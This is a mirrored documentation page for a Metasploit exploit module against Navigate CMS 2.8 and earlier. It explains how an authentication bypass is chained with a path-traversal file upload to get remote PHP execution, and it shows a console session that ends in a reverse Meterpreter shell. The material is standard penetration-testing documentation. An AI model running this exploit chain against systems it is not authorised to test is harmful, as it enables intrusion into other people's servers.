ContextQMD
Back to Metasploit Framework

Navigate Cms Rce

documentation/modules/exploit/multi/http/navigate_cms_rce.md

6.4.1311.5 KB
Original Source

Description

This module exploits insufficient sanitization in the database::protect method, of Navigate CMS versions 2.8 and prior, to bypass authentication. It then uses a path traversal vulnerability in navigate_upload.php that allows authenticated users to upload PHP files to arbitrary locations. Together these vulnerabilities allow an unauthenticated attacker to execute arbitrary PHP code remotely.

This module was tested against Navigate CMS 2.8.

Verification Steps

Navigate CMS 2.8

Verification Steps

  1. Install Navigate CMS
  2. Start msfconsole
  3. use exploit/multi/http/navigate_cms_rce
  4. set RHOST <rhost>
  5. check
  6. You should see The target appears to be vulnerable.
  7. exploit
  8. You should get a meterpreter session

Scenarios

msf > use exploit/multi/http/navigate_cms_rce
msf exploit(multi/http/navigate_cms_rce) > set RHOST 192.168.178.45
RHOST => 192.168.178.45
msf exploit(multi/http/navigate_cms_rce) > check
[*] 192.168.178.45:80 The target appears to be vulnerable.
msf exploit(multi/http/navigate_cms_rce) > exploit

[*] Started reverse TCP handler on 192.168.178.35:4444 
[+] Login bypass successful
[+] Upload successful
[*] Triggering payload...
[*] Sending stage (37775 bytes) to 192.168.178.45
[*] Meterpreter session 1 opened (192.168.178.35:4444 -> 192.168.178.45:52720) at 2018-09-26 22:24:59 +0200

meterpreter >